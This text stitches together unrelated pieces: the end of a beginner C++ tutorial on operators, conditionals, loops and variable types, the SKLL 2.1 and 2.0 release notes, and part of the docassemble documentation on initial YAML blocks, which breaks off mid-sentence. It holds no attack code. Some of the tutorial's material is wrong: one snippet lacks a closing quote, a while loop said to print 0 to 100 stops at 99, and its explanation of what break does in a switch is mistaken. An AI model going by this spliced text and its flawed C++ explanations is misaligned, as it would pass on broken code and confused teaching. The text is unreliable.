long as you came back. Step 7: It's Time to Operate Doctor! Before you can progress to loops and conditionals, you will need to know the C++ comparison and mathematical operators. There are quite a few to remember, but proficiency will come with practice. Here is the list: == Comparison operator "is equal" != Comparison operator "is not equal" <= Comparison operator "is less than or equal to" >= Comparison operator "is greater than or equal to" < Comparison operator "less than" > Comparison operator "greater than" || conditional operator "or" && Conditional operator "and" = Assignment operator "equals" + Math operator "add" - Math operator "subtract" / Math operator "divide" * Math operator "multiply" -- Math operator "decrement" ++ Math operator "increment" % Math operator "remainder of division" Step 8: Exterme Conditioning Well, we have looked at the VERY basics of C++ in our example program, but what if you want your code to have two possible outcomes? Statements called CONDITIONALS were born for the task. There are three basic conditionals. Namely: if else switch if/else statements are the easiest, so let's start there. In this example code: if (1 == 1) { std::cout << "The universe has survived!; }else { std::cout << "This computer no longer exists..."; } IF one is equal to one, print one thing, ELSE print something else. notice the "==" operator instead of "=" "==" is a comparison whereas "=" is an assignment. Here are some other operators: != Is not equal to ++ Increment by one -- Decrement by one + Add && And || Or >= Greater than / equal to <= Less than / equal to / Divide * Multiply - Subtract % Modulus find the remainder of a division Those are all of the non-advanced C++ default operators, and all you should need for both conditional statements and loops. Let's get to the next statement, switch. int foo = 3; switch(foo) { case 1: std::cout << "One"; break; case 2: std::cout << "Two"; break; case 3: std::cout << "Three"; break; } In a switch, the case whose value matches the value of the variable used (must be an int or enum) is selected and run. The break keeps the branch from looping infinitely. You may also add a default case to the end to handle an input outside what is expected. Step 9: Getting Loopy Another critical element of C++ is the loop. There are three kinds of loops, while, for and do. Let us begin with the while loop. int foo = 0; while (foo < 100) { std::cout << foo; foo++; } This code snippet will print every integral number from 0-100 to the console. The syntax of a while loop is: while(condition) {COMMANDS} the loop will run as long as condition is evaluated as true. You can make an infinite loop by putting '1' or "true" as the condition. Here is a snippet of a for loop: for (int i = 0; i < 100; i++) { std::cout << i; } This kind of loop is good for applications where you want to perform an incremental operation such as looking at each letter of a string or each element of an array. The syntax of a for loop is: for (local variable;condition;callback){COMMANDS} The code snippet from above initializes an integer variable 'i' and runs the loop as long as i's value is less than 100 incrementing it every loop cycle. The last loop to go over is a do. Here is another snippet: do { std::cout << "Spam"; }while(true); Syntax is: do {COMMANDS}while(condition); The do is very similar to the while, except it is guaranteed to run at least once. Also, notice the semicolon after the while portion. it is easy to forget. This loop will run forever because the "true" inside the parentheses is equivalent to saying if 1 == 1. Step 10: Do You Know How to Type? Unlike in most scripting languages, in C++ you have to define the type of any variable you create. That is, what kind of value it will hold. I will go over the VERY basic types, because there are a tremendous number of types (several hundred) and it would take hours to type them all. So here are the basic types: int An integer number float A floating point number holds decimals double Similar to a float, but has greater precision bool A Boolean value. Either true or false (0 or 1) std::string A sequence of characters, requires <string> header char A single character To declare and initialize a variable, use this syntax: typename name = value; So you could initialize an integer variable with a value of sixteen like this: int foo = 16 You can make an ARRAY of any type by declaring it like this: type NAME [integer value] = {values}; This will create an array with a number of elements equal to the value between the brackets. you can index an array like this: int foo[3] = {1,2,3}; std::cout << foo[0] << " " << foo[2]; This would output 1 3. Array indexing begins at zero. Step 11: Whaddya Gonna Do Now Coder? Well, your short time in my tutelage has come to an end (for now) For your further edification and education. check out these sites: stackoverflow cplusplus.com stackexchange Happy coding! Dominic
http://www.instructables.com/id/Pi-3142-3143/
CC-MAIN-2017-17
refinedweb
2,307
73.88
SciKit-Learn Laboratory v2.1 Release NotesRelease Date: 2020-03-13 // over 1 year ago This is a minor release of SKLL with the only change being that it is now compatible with scikit-learn v0.22.2. ⚡️ There are several changes in scikit-learn v0.22 that might cause several estimators and functions to produce different results even when fit with the same data and parameters. Therefore, SKLL 2.1 can also yield different results compared to previous versions even with the same data and same settings. ⚡️ 🍱 💡 New features 💡 🍱 🔎 Other minor changes 🔎 - ⚡️ Update imports to align with the new scikit-learnAPI. - 🛠 A minor bugfix in logutils.py. - ⚡️ Update some test outputs due to changes in scikit-learnmodels and functions. - 🚀 Update some tests to make pre-release testing for conda and PyPI packages possible. 🍱 👩🔬 Contributors 👨🔬 (Note: This list is sorted alphabetically by last name and not by the quality/quantity of contributions to this release.) Aoife Cahill (@aoifecahill), Binod Gyawali (@bndgyawali), Matt Mulholland (@mulhod), Nitin Madnani (@desilinguist), and Mengxuan Zhao (@chaomenghsuan). Previous changes from v2.0 🛠 This is a major new release. It's probably the largest SKLL release we have ever done since SKLL 1.0 came out! It includes dozens of new features, bugfixes, and documentation updates! ⚡️ SKLL 2.0 is backwards incompatible with previous versions of SKLL and might yield different results compared to previous versions even with the same data and same settings. ⚡️ 🍱 💥 Incompatible Changes 💥 ✅ Python 2.7 is no longer supported since the underlying version of scikit-learn no longer supports it (Issue #497, PR #506). 🔧 Configuration field objectivehas been deprecated and replaced with objectiveswhich allows specifying multiple tuning objectives for grid search (Issue #381, PR #458). 🔧 Grid search is now enabled by default in both the API as well as while using a configuration file (Issue #463, PR #465). ✅ The Predictorclass previously provided by the generate_predictionsutility script is no longer available. If you were relying on this class, you should just load the model file and call Learner.predict()instead (Issue #562, PR #566). ✅ There are no longer any default grid search objectives since the choice of objective is best left to the user. Note that since grid search is enabled by default, you must either choose an objective or explicitly disable grid search (Issue #381, PR #458). mean_squared_erroris no longer supported as a metric. Use neg_mean_squared_errorinstead (Issue #382, PR #470). The cv_folds_fileconfiguration file field is now just called folds_file(Issue #382, PR #470). ✅ Running an experiment with the learning_curvetask now requires specifying metricsin the Outputsection instead of objectivesin the Tuningsection (Issue #382, PR #470). 👀 Previously when reading in CSV/TSV files, missing data was automatically imputed as zeros. This is not appropriate in all cases. This no longer the case and blanks are retained as is. Missing values will need to be explicitly dropped or replaced (see below) before using the file with SKLL (Issue #364, PRs #475 & #518). ✅ pandasand seabornare now direct dependencies of SKLL, and not optional (Issues #455 & #364, PRs #475 & #508). 🍱 💡 New features 💡 👀 CSVReader/ CSVWriter& TSVReader/ TSVWriternow use pandasas the backend rather than custom code that relied on the csvmodule. This leads to significant speedups, especially for very large files (~5x for reading and ~10x for writing)! The speedup comes at the cost of moderate increase in memory consumption. See detailed benchmarks here (Issue #364, PRs #475 & #518). ✅ SKLL models now have a new pipelineattribute which makes it easy to manipulate and use them in scikit-learn, if needed (Issue #451, PR #474). ⚡️ scikit-learnupdated to 0.21.3 (Issue #457, PR #559). 📦 The SKLL conda package is now a generic Python package which means the same package works on all platforms and on all Python versions >= 3.6. This package is hosted on the new, public ETS anaconda channel. ⚡️ SKLL learner hyperparameters have been updated to match the new scikit-learndefaults and those upcoming in 0.22.0 (Issue #438, PR #533). ✅ Intermediate results for the grid search process are now available in the results.jsonfiles (Issue #431, #471). ✅ The K models trained for each split of a K-fold cross-validation experiment can now be saved to disk (Issue #501, PR #505). ✅ Missing values in CSV/TSV files can be dropped/replaced both via the command line and the API (Issue #540, PR #542). ✅ Warnings from scikit-learnare now captured in SKLL log files (issue #441, PR #480). 🖨 Learner.model_params()and, consequently, the print_model_weightsutility script now work with models trained on hashed features (issue #444, PR #466). The print_model_weightsutility script can now output feature weights sorted by class labels to improve readability (Issue #442, PR #468). ✅ The skll_convertutility script can now convert feature files that do not contain labels (Issue #426, PR #453). 🛠 Bugfixes & Improvements 🛠 🛠 Fix several bugs in how various tuning objectives and output metrics were computed (Issues #545 & #548, PR #551). Fix how pos_label_stris documented, read in, and used for classification tasks (Issues #550 & #570, PRs #566 & #571). Fix several bugs in the generate_predictionsutility script and streamline its implementation to not rely on an externally specified positive label or index but rather read it from the model file or infer it (Issues #484 & #562, PR #566). 🛠 Fix bug due to overlap between tuning objectives that metrics that could prevent metric computation (Issue #564, PR #567). ✅ Using an externally specified folds_filefor grid search now works for evaluateand predicttasks, not just train(Issue #536, PR #538). Fix incorrect application of sampling before feature scaling in Learner.predict()(Issue #472, PR #474). ✅ Disable feature sampling for MultinomialNBlearner since it cannot handle negative values (Issue #473, PR #474). ➕ Add missing logger attribute to Learner.FilteredLeaveOneGroupOut(Issue #541, PR #543). Fix FeatureSet.has_labelsto recognize list of Noneobjects which is what happens when you read in an unlabeled data set and pass label_col=None(Issue #426, PR #453). 🛠 Fix bug in ARFFWriterthat adds/removes label_colfrom the field names even if it's Noneto begin with (Issue #452, PR #453). ✅ Do not produce unnecessary warnings for learning curves (Issue #410, PR #458). ✅ Show a warning when applying feature hashing to multiple feature files (Issue #461, PR #479). 🛠 Fix loading issue for saved MultinomialNBmodels (Issue #573, PR #574). ⬇️ Reduce memory usage for learning curve experiments by explicitly closing matplotlibfigure instances after they are saved. 👌 Improve SKLL’s cross-platform operation by explicitly reading and writing files as UTF-8 in readers and writers and by using the newlineparameter when writing files. 📚 📖 Documentation Updates 📖 📚 Reorganize documentation to explicitly document all types of output files and link them to the corresponding configuration fields in the Outputsection (Issue #459, PR #568). ➕ Add new interactive tutorial that uses a Jupyter notebook hosted on binder (Issue #448, PRs #547 & #552). ➕ Add a new page to official documentation explaining how the SKLL code is organized for new developers (Issue #511, PR #519). 📚 Update SKLL contribution guidelines and link to them from official documentation (Issues #498 & #514, PR #503 & #519). 📚 Update documentation to indicate that pandasand seabornare now direct dependencies and not optional (Issue #553, PR #563). 📚 Update LogisticRegressionlearner documentation to talk explicitly about penalties and solvers (Issue #490, PR #500). ✅ Properly document the internal conversion of string labels to ints/floats and possible edge cases (Issue #436, PR #476). ➕ Add feature scaling to Boston regression example (Issue #469, PR #478). 📚 Several other additions/updates to documentation (Issue #459, PR #568). ✔️ Tests ✔️ 📦 Make testsinto a package so that we can do something like from skll.tests.utils import Xetc. (Issue #530 , PR #531). ➕ Add new tests based on SKLL examples so that we would know if examples ever break with any SKLL updates (Issues #529 & #544, PR #546). 🏁 Tweak tests to make test suite runnable on Windows (and pass!). ➕ Add Azure Pipelines integration for automated test builds on Windows. ➕ Added several new comprehensive tests for all new features and bugfixes. Also, removed older, unnecessary tests. See various PRs above for details. ✅ Current code coverage for SKLL tests is at 95%, the highest it has ever been! 🍱 🔍 Other changes 🔍 ✅ Replace prettytablewith the more actively maintained tabulate(Issue #356, PR #467). ✅ Make sure entire codebase complies with PEP8 (Issue #460, PR #568). ⚡️ Update the year to 2019 everywhere (Issue #447, PRs #456 & #568). ⚡️ Update TravisCI configuration to use conda_requirements.txtfor building environment (PR #515). 🍱 👩🔬 Contributors 👨🔬 (Note: This list is sorted alphabetically by last name and not by the quality/quantity of contributions to this release.) Supreeth Baliga (@SupreethBaliga), Jeremy Biggs (@jbiggsets), Aoife Cahill (@aoifecahill), Ananya Ganesh (@ananyaganesh), R. Gokul (@rgokul), Binod Gyawali (@bndgyawali), Nitin Madnani (@desilinguist), Matt Mulholland (@mulhod), Robert Pugh (@Lguyogiro), Maxwell Schwartz (@maxwell-schwartz), Eugene Tsuprun (@etsuprun), Avijit Vajpayee (@AVajpayeeJr), Mengxuan Zhao (@chaomenghsuan)
https://python.libhunt.com/skll-latest-version
CC-MAIN-2021-43
refinedweb
1,433
57.47
Hi Neal, --- "Neal H. Walfield" <address@hidden> wrote: > My impression is that the fourth argument to > device_open is a send > right to the device... ... of type device_t. > ... which is supplied as the first argument to > device_read et al. of type device_t. I checked include/device/device.defs and it mentions device_t. > Also, make sure that you add your lprread function > to the lpr device > structure (i.e. along side lpropen). This I did. :) So, this is what I have now in test.c on hurd: static device_t lpr_dev; device_t device_master; error_t err; unsigned long result; err = get_privileged_ports (0, &device_master); err = device_open (device_master, D_READ | D_WRITE, "lpr", &lpr_dev); mach_msg_type_number_t data_cnt = sizeof (result); err = device_read (lpr_dev, 0, -1, sizeof (result), (void *) &result, &data_cnt); On i386/i386at/lpr.c in gnumach-1-branch, I have lprread(dev, ior) int dev; io_req_t ior; { register int err; unsigned long data = 0x5a5a; printf("lpr.c: lprread()...\n"); /* err = device_read_alloc (ior, (vm_size_t) ior->io_count); if (err != KERN_SUCCESS) return (err); */ ior->io_data = data; ior->io_residual = ior->io_count - sizeof (data); return (D_SUCCESS); } On executing test with re-compiled driver, the "lpr.c: lprread()" gets printed, and then I get: panic: pmap_remove: null pv_list! and then it reboots. Even if I tried to uncomment the lines in lprread for device_read_alloc, the same panic occurs. Any suggestions on what is wrong? OR Is it possible for you to give me a simple example wherein you send an unsigned long variable's address through device_read on hurd, and its value gets assigned in lprread in gnumach-1-branch and returned? Thanks for your help, SK ------------------------------------------------------------ Shakthi Kannan, MS Software Engineer, Specsoft (Hexaware Technologies) [E]: address@hidden [M]: (91) 98407-87007 [W]: [L]: Chennai, India ------------------------------------------------------------ ______________________________________________________ Yahoo! for Good Donate to the Hurricane Katrina relief effort.
http://lists.gnu.org/archive/html/bug-hurd/2005-09/msg00165.html
CC-MAIN-2016-22
refinedweb
292
59.19
Smart Pointers (3/6): std::shared_ptr Automatic memory management alias garbage collector provides release of memory which was allocated by the program, but, then, is no longer referenced. C++ has no explicit garbage collector mechanism. Quotation from Bjarne Strousb: “I don’t like garbage. I don’t like littering. My ideal is to eliminate the need for a garbage colletor by not producting any garbage. That is now possible. Tools supporting and enforcing the programming techniques that achieves that are being produced.” Since C++11, we have a strong resource-owning and resource-sharing library to manage the lifetime of object: std::shared_ptr. Shared Smart Pointer provides more than one ownership during the lifetime of the object. Shared pointer class instances may own the same object. Sharing mechanism is working on copying, moving and assigning over the share pointer objects. Shared pointer class holds two pointers contrast unique pointer class. These pointers are the owned object pointer and control block pointer. What is the control block? Unique pointers don’t share any object. It only holds the owns object. But, If we want to share this owns an object, we need a bigger mechanism. We need to keep more data-related sharing such as counters, the deleter. That’s why the size of the shared pointer is bigger than the unique pointer. As we said, the shared pointer contains two pointers, one of them is owned object pointer, the other is the control block pointer. The control block’s memory is not part of the shared pointer class. The shared pointer object only keeps its pointer. Suppose we have a class named embeddedWorld. We create an embeddedWorld class object with a shared pointer. And totally, three shared_pointer points to the same object. Every new shared pointer increments the reference count from the control block. If the shared pointer goes out of scope or resets the reference count decrements. When the reference count reaches zero the owned object is deleted by the control block. The diagram of this example and the object is pointed in three-way code are below. The diagram of three shared pointer instances #include <iostream> #include <memory> using namespace std; class embeddedWorld { public: embeddedWorld(int p_no): planetNo(p_no) {} int getPlanetNo() const { return planetNo; }; private: int planetNo = 0; }; int main() { std::shared_ptr<embeddedWorld> e1(make_shared<embeddedWorld> (10)); std::shared_ptr<embeddedWorld> e2; e2 = e1; //copy assignment std::shared_ptr<embeddedWorld> e3(e2); //copy constructor cout << "e3.use_count(): " << e3.use_count() << endl; return 0; } The output is the code above: “e3.use_count(): 3” The Aliasing Constructor: shared_ptr( const shared_ptr& r, element_type* ptr ) noexcept A shared pointer instance can be constructed with another shared pointer (r) to share ownership but it can hold a different pointer (ptr). When we call the pointer always return ptr. When all shared pointers go out of scope or reset, the unmanaged pointer ptr remains. The responsibilities of unmanaged pointer ptr belong to us. Here is a little example of using the aliasing constructor. #include <iostream> #include <memory> using namespace std; class embeddedWorld { public: embeddedWorld(int p_no): planetNo(p_no) {} ~embeddedWorld() { cout << "called Embedded World Destructor, planet No: " << planetNo << endl; }; int getPlanetNo() const { return planetNo; }; private: int planetNo = 0; }; int main() { { std::shared_ptr<embeddedWorld> e1(make_shared<embeddedWorld> (10)); std::shared_ptr<embeddedWorld> e2 = e1; embeddedWorld *myEmbeddedWorld = new embeddedWorld(5); std::shared_ptr<embeddedWorld> e3(e2, myEmbeddedWorld); cout << "e1 or e2 planet No: " << e1->getPlanetNo() << endl; cout << "e3 planet No: " << e3->getPlanetNo() << endl; } return 0; } Output: “e1 or e2 planet No: 10 e3 planet No: 5 called Embedded World Destructor, planet No: 10″ If we take a look at the code above: We create two instances with shared ownership and the pointer. The pointer of the class embeddedWorld’s planet number is 10; afterward, we create an instance named e3, sharing ownerships with e1 and e2 but it holds the new embeddedWorld object pointer named myEmbeddedWorld. Its planet number is also 5. All instances are localized with braces in the main function due to observing all instances going out of scope. When all of them go out of scope, the object pointer myEmbeddedWorld remains but we have no any way to access it. That’s why we need to make sure the unmanaged pointer, myEmbeddedWorld remains valid as long as that owned object exists. Using std::shared_ptr<T>(this) Using this inside the managed object may result in memory crash problems. Because when we use this, std::shared_ptr<T>(this) creates a new shared pointer that has a new control block and ownership. The usage in the managed object already has ownership. Let’s take a look at this example: #include <iostream> #include <memory> #include <vector> using namespace std; class embeddedWorld; std::vector<std::shared_ptr<embeddedWorld> unionWorlds; class embeddedWorld { public: embeddedWorld(int p_no): planetNo(p_no) {} int getPlanetNo() const { return planetNo; }; void saveToUnion() { unionWorlds.push_back(std::shared_ptr<embeddedWorld> (this)); } private: int planetNo = 0; }; int main() { { std::shared_ptr<embeddedWorld> e1(make_shared<embeddedWorld> (10)); e1->saveToUnion(); } cout << unionWorlds.at(0).use_count() << endl; cout << unionWorlds.at(0)->getPlanetNo(); return 0; } Our managed class is embeddedWorld and it has a function to save itself to unionWorld collect class such as std::vector. When it saves itself in the vector with std::shared_ptr<embeddedWorld>(this), then, the new shared pointer instance is created with the new control block. There will be two shared smart pointers with different ownership but the same object (this). When the e1 instance goes out of scope, and we write it in localized block to see this risk, the managed object (this) will be deleted with its deleter. Afterward, when we want to reach the object via the vector, unionWorld, we will get the different instances with the deleted resources (this). For preventing this issue, the library: memory has a class we can publicly inherit: std::enable_shared_from_this. It provides a function named shared_from_this to return itself with the same ownership. This technic is also called CRTP When we change the example above, with these technics: #include <iostream> #include <memory> #include <vector> using namespace std; class embeddedWorld; std::vector<std::shared_ptr<embeddedWorld> unionWorlds; class embeddedWorld: public std::enable_shared_from_this < embeddedWorld> { public: embeddedWorld(int p_no): planetNo(p_no) {} int getPlanetNo() const { return planetNo; }; void saveToUnion() { unionWorlds.emplace_back(shared_from_this()); } private: int planetNo = 0; }; int main() { { std::shared_ptr<embeddedWorld> e1(make_shared<embeddedWorld> (10)); e1->saveToUnion(); cout << e1.use_count() << endl; // we see: 2 } cout << unionWorlds.at(0).use_count() << endl; // we see: 2 also cout << unionWorlds.at(0)->getPlanetNo(); // There is no risk anymore return 0; } The function, std::make_shared provides advantages for performance and safety. We talked about the advantage of using a kind of make smart pointers functions at unique pointer side. Using the make_share function prevents memory leakage. If we want to use a custom deleter, we need to know the make_shared function doesn’t allow a custom deleter. Now, we will create our own custom shared pointer class in the next article. Smart Pointers (4/6): std::weak_ptr Resources: std::shared_ptr std::make_shared Effective Modern C++ by Scott Meyers
https://myembeddedworld.com/smart-pointers-3-6/
CC-MAIN-2022-40
refinedweb
1,161
54.93
I would like to open and read a text file at program launch, using Qt - pditty8811 last edited by I would like to open a text file at program launch, using Qt. I would like the text to appear in the text field which is called textEdit. It is a simple notepad program that I am changing into an app I want to do other special things. How do I input a text file, say "text.txt" into my textEdit widget upon program launch? All of the text file. Writing with C++. Thanks. - p3c0 Moderators last edited by Hi, You can open and read the file from your QMainWindow or QDialog's constructor. Try the following code: @ #include "mainwindow.h" #include "ui_mainwindow.h" #include <QFile> #include <QTextStream> MainWindow::MainWindow(QWidget *parent) : QMainWindow(parent), ui(new Ui::MainWindow) { ui->setupUi(this); loadFile(); } MainWindow::~MainWindow() { delete ui; } void MainWindow::loadFile() { QFile file(":/read.txt"); //If present in Resource // QFile file("D:/Test/read.txt"); //If present on system file.open(QIODevice::ReadOnly); QTextStream stream(&file); QString line = stream.readAll(); file.close(); ui->textEdit->setText(line); } @ - pditty8811 last edited by Thank you. That did it.
https://forum.qt.io/topic/32855/i-would-like-to-open-and-read-a-text-file-at-program-launch-using-qt
CC-MAIN-2022-27
refinedweb
192
69.48
0 If I uncomment the 'int x;' above main, and comment out the int x = 0 inside of main, it works, but I don't want to use global variables. What I can't understand is why x is out of scope. The text I'm using says “vars having local or block scope may be used only in the part of the program between their definition and the block’s closing brace” - so if I declare x at the start of the main function, it seems like its scope should last until the end of the whole program, and x should be usable in all functions that follow its initialization. #include <iostream> using namespace std; void nonRefVarChanger(); //int x; int main () { int x = 0; nonRefVarChanger(); cout << "x is " << x << endl; return 0; } // Fn def void nonRefVarChanger() // also wanted to avoid passing by reference { x = 5; // error: 'x' was not declared in this scope }
https://www.daniweb.com/programming/software-development/threads/264343/scopes-trial
CC-MAIN-2016-44
refinedweb
154
58.79
This section discusses blocks that will typically appear at the beginning of the YAML of your interview. If you are new to docassemble, you probably will not need to use “initial blocks” until you attempt something more advanced, so you can skip this section and proceed to the section on questions. Interview title and other metadata --- metadata: title: | Advice on Divorce short title: | Divorce description: | A divorce advice interview authors: - name: John Doe organization: Example, Inc. revision_date: 2015-09-28 --- A metadata block contains information about the interview, such as the name of the author. It must be a YAML dictionary, but each the dictionary items can contain any arbitrary YAML structure. If a title is defined, it will be displayed in the navigation bar in the web app. If a short title is provided, it will be displayed in place of the title when the size of the screen is small. If a logo is defined, it will be displayed in the navigation bar in the web app in place of the title and short title. The content of the logo should be raw HTML. If you include an image, you should size it to be about 20 pixels in height. If a tab title is provided, it will be displayed as the title of the browser tab. Otherwise, the title will be used. If a subtitle is provided, it will be displayed as the subtitle of the interview in the “Interviews” list available to a logged-in user at /interviews. These titles can be overridden using the set_parts() function. The metadata block and the set_parts() function can be used to modify other aspects of the navigation bar. If an exit link is provided, the behavior of the “Exit” link can be modified. (The “Exit” menu option is displayed when the show login configuration directive is set to False or the show login metadata specifier in an interview is set to False.) The value can be either exit, leave, or logout. If it is exit, then when the user clicks the link, they will be logged out (if they are logged in) and their interview answers will be deleted from the server. If it is leave, the user will be logged out (if they are logged in), but the interview answers will not be deleted from the server. (It can be important to keep the interview answers on the server if background tasks are still running.) If it is logout, then if the user is logged in, the user will be logged out, but if the user is not logged in, this will have the same effect as leave. If an exit url is provided, the user will be redirected to the given URL. If no exit url is provided, the user will be directed to the exitpage if the exit link is exit or leave, and directed to the login page if the user is logged in and exit link is logout. The exit url also functions as an interview-level default value in place of the system-wide exitpage, which is used by the command() function and used on special pages that show buttons or choices that allows users to exit or leave. If exit label is provided, the given text will be used in place of the word “Exit” on the “Exit” menu option. This text is passed through the word() function, so that it can be translated into different languages. If you set unlisted: True for an interview that has an entry in the dispatch list in your configuration, the interview will be exempted from display in the list of interviews available at /list. For more information about this, see the documentation for the dispatch configuration directive. If you set hidden: True, then interview sessions for this interview will be omitted from the “My Interviews” listing of sessions. (They will still be deleted by the “Delete All” button, though.) You can set tags to a list of one or more “tags” as a way of categorizing the interview. metadata: title: Write your will tags: - estates - wills The list of available interviews at /list and the list of interview sessions at /interviews make use of the metadata tags for filtering purposes. Note that the metadata of an interview are static, while the tags of a particular session of an interview are dynamic, and can be changed with session_tags(). If you set sessions are unique to True, then docassemble will resume an existing session for the user, if the user already has an existing session. This requires that the user be logged in, so the user will be redirected to the login screen if they try to access an interview for which sessions are unique is set to True. You can also set sessions are unique to a list of roles, in which case uniqueness will be enforced only if the user has one of the listed roles. If you set required privileges to a list of one or more privileges, then a user will only be able to use the interview if they have one of the given privileges. If anonymous is included as one of the required privileges, then users who are not logged in will be able to use the interview. However, note that anonymous is not actually a privilege in docassemble’s privilege management system; only logged-in users actually have privileges. If no required privileges are listed, then the default is that the interview can be used by anybody. metadata: title: Administrative interview short title: Admin description: | A management dashboard sessions are unique: True required privileges: - admin - developer - advocate If there are multiple metadata blocks in the YAML of an interview that set required privileges, the required privileges settings of later metadata blocks will override the required privileges settings of earlier metadata blocks. Setting required privileges: [] will ensure that the interview can be used, notwithstanding the required privileges settings of any earlier metadata blocks. The required privileges for listing metadata specifier is like required privileges, except it only controls whether the interview will be shown in the list of interviews available at /list. The required privileges metadata specifier also controls whether the interview will be listed. For more information about the /list page, see the documentation for the dispatch configuration directive. You can set an error action if you want your interview to do something substantive in the event that your interview encounters an error that it would otherwise show to the user. A simple application of error action would be to replace the error screen with a question: When the interview encounters an error, the interview will run the action given by error action. In this case, error action is on_error, and calling this action shows a question to the user. An action can also run code that changes the interview logic. For example, an error action could skip through the remainder of the questions and present a final screen: metadata: error action: on_error --- event: on_error code: | healthy = False --- mandatory: True code: | if not healthy: fail_safe favorite_fruit favorite_vegetable favorite_number final_screen --- sets: fail_safe code: | if not defined('favorite_fruit'): favorite_fruit = '_________' if not defined('favorite_vegetable'): favorite_vegetable = '_________' if not defined('favorite_number'): favorite_number = '____' final_screen If the attempt to run the error action also results in an error, the latter error is shown on the screen in the usual fashion. See error help and verbose error messages for other ways to customize error messages. The metadata block also accepts specifiers for default content to be inserted into various parts of the screen. You can provide different values for different languages by setting each directive to a dictionary in which the keys are languages and the values are content. metadata: post: en: | This interview was sponsored in part by a grant from the Example Foundation. es: | Esta entrevista fue patrocinada en parte por una beca de la Fundación Ejemplo. For information about other ways to set defaults for different parts of the screens during interviews, see the screen parts section. The metadata block also accepts the specifier error help. This is Markdown-formatted text that will be included on any error screen that appears to the user during the interview. You can also provide this text on a server-wide basis using the error help directive in the Configuration. To support multiple languages, you can set error help to a dictionary where the keys are language codes and the values are the error text to be shown: This will not always be reliable, because an error might happen before the user’s language is known. The metadata block also accepts the specifier show login, which can be true or false. This controls whether the user sees a “Sign in or sign up to save answers” link in the upper right-hand corner during the interview. If show login is not specified in the metadata, the Configuration directive show login determines whether this link is available. By default, all of the functions and classes of docassemble.base.util are imported into the namespace of a docassemble interview. If you want to load names manually using a modules block, you can set suppress loading util to True: metadata: suppress loading util: True If suppress loading util is True, the only name that will be imported into your interview is process_action. Creating objects --- objects: - spouse: Individual - user.case: Case --- An objects block creates objects that may be referenced in your interview. See objects for more information about objects in docassemble. If your interview references the variable spouse, docassemble will find the above objects block and process it. It will define spouse as an instance of the object class Individual and define user.case as an instance of the object class Case. The use of objects in docassemble interviews is highly encouraged. However, the objects you use as variables need to inherit from the class DAObject. Otherwise, docassemble might not be able to find the appopriate code blocks or questions necessary to define them. This is because of the way docassemble keeps track of the names of variables. A code block like this would effectively do the same thing as the objects block above: --- code: | spouse = Individual('spouse') user.initializeAttribute('case', Case) --- This code is more complicated than normal Python code for object initialization because the full name of the variable needs to be supplied to the function that creates and initializes the object. The base class DAObject keeps track of variable names. In some situations, running spouse = Individual() will correctly detect the variable name spouse, but in other situations, the name cannot be detected. Running spouse = Individual('spouse') will always set the name correctly. Whenever possible, you should use objects blocks rather than code to initialize your objects because objects blocks are clean and readable. You can also use objects blocks to initialize attributes of the objects you create. For information on how to do this, see the documentation for the using() method. Importing objects from file --- objects from file: - claims: claim_list.yml --- An objects from file block imports objects or other data elements that you define in a separate YAML or JSON data file located in the sources folder of the current package. If the interview file containing the objects from file block is data/questions/manage_claims.yml, docassemble will expect the data file to be located at data/sources/claim_list.yml. For more information about how this works, and about how to format the data file, see the documentation for the objects_from_file() function. The example above is equivalent to running claims = objects_from_file('claim_list.yml', name='claims'). If you set use objects to True, then the use_objects keyword parameter of the objects_from_file() function will be used. --- use objects: True objects from file: - claims: claim_list.yml --- This is equivalent to running claims = objects_from_file('claim_list.yml', name='claims', use_objects=True). Incorporation by reference: include --- include: - basic-questions.yml - docassemble.helloworld:questions.yml --- The include block incorporates the questions in another YAML file, almost as if the contents of the other YAML file appeared in place of the include block. When the included file is parsed, files referenced within it will be assumed to be located in the included file’s package. When a filename is provided without a package name, docassemble will look first in the data/questions directory of the current package (i.e., the package within which the YAML file being read is located), and then in the data/questions directory of docassemble.base. You can include question files from other packages by explicitly referring to their package names. E.g., docassemble.helloworld:questions.yml refers to the file questions.yml in the docassemble/helloworld/data/questions directory of that package. Images With attribution: image sets --- image sets: freepik: attribution: | Icon made by [Freepik]() images: baby: crawling.svg people: users6.svg injury: accident3.svg --- An image sets block defines the names of icons that you can use to decorate your questions. The file names refer to files located in the data/static directory of the package in which the YAML file is located. Since most free icons available on the internet require attribution, the image sets block allows you to specify what attribution text to use for particular icons. The web app shows the appropriate attribution text at the bottom of any page that uses one of the icons. The example above is for a collection of icons obtained from the web site Freepik, which offers free icons under an attribution-only license. The image sets block must be in the form of a YAML dictionary, where the names are the names of collections of icons. The collection itself is also a dictionary containing terms images and (optionally) an attribution. The images collection is a dictionary that assigns names to icon files, so that you can refer to icons by a name of your choosing rather than by the name of the image file. For information on how to use the icons you have defined in an image sets block, see decoration in the question modifiers section, buttons in the setting variables section, and “Inserting inline icons” in the markup section. Without attribution: images --- images: bills: money146.svg children: children2.svg --- An images block is just like an image sets block, except that it does not set any attribution information. It is simpler because you do not need to give a name to a “set” of images. The above images block is essentially equivalent to writing: --- image sets: unspecified: images: bills: money146.svg children: children2.svg --- Python modules Importing the module itself: imports --- imports: - datetime - us --- imports loads a Python module name into the namespace in which your code and question templates are evaluated. The example above is equivalent to running the following Python code: import datetime import us Importing all names in a module: modules --- modules: - datetime --- Like imports, modules loads Python modules into the namespace in which your code and question templates are evaluated, except that it imports all of the names that the module exports. The example above is equivalent to running the following Python code: from datetime import * Storing structured data in a variable The data block allows you to specify a data structure in YAML in a block and have it available as a Python data structure. For example, in this interview we create a Python list and then re-use it in two questions to offer a multiple-choice list. In Python, the variable fruits is this: [u'Apple', u'Orange', u'Peach', u'Pear'] You can also use the data block to create more complex data structures. You can also use Mako in the data structure. variable name: fruits data: Apple: description: | The apple is a tasty red fruit. Everyone on ${ planet } loves to eat apples. seeds: 5 Orange: description: | The orange is, surprisingly, orange-colored. Most people on ${ planet } dislike eating oranges. seeds: 10 Peach: description: | The peach is a fragile fruit. There are 165,323 peach orchards on ${ planet }. seeds: 1 Pear: description: | The pear is variously yellow, green, or brown. The planet ${ planet } is shaped like a pear. seeds: 0 --- question: | On what planet were you born? fields: Planet: planet --- question: | What is your favorite fruit? field: user_favorite_fruit choices: code: fruits.keys() --- mandatory: True question: | Summary of ${ user_favorite_fruit } subquestion: | ${ fruits[user_favorite_fruit]['description'] } The ${ user_favorite_fruit } has ${ nice_number(fruits[user_favorite_fruit]['seeds']) } seeds. data blocks do not work the same way as template blocks. The Mako templating in a data block is evaluated at the time the variable indicted by variable name is defined. The text stored in the data structure is the result of processing the Mako templating. The Mako templating is not re-evaluated automatically each time a question is shown. You can also 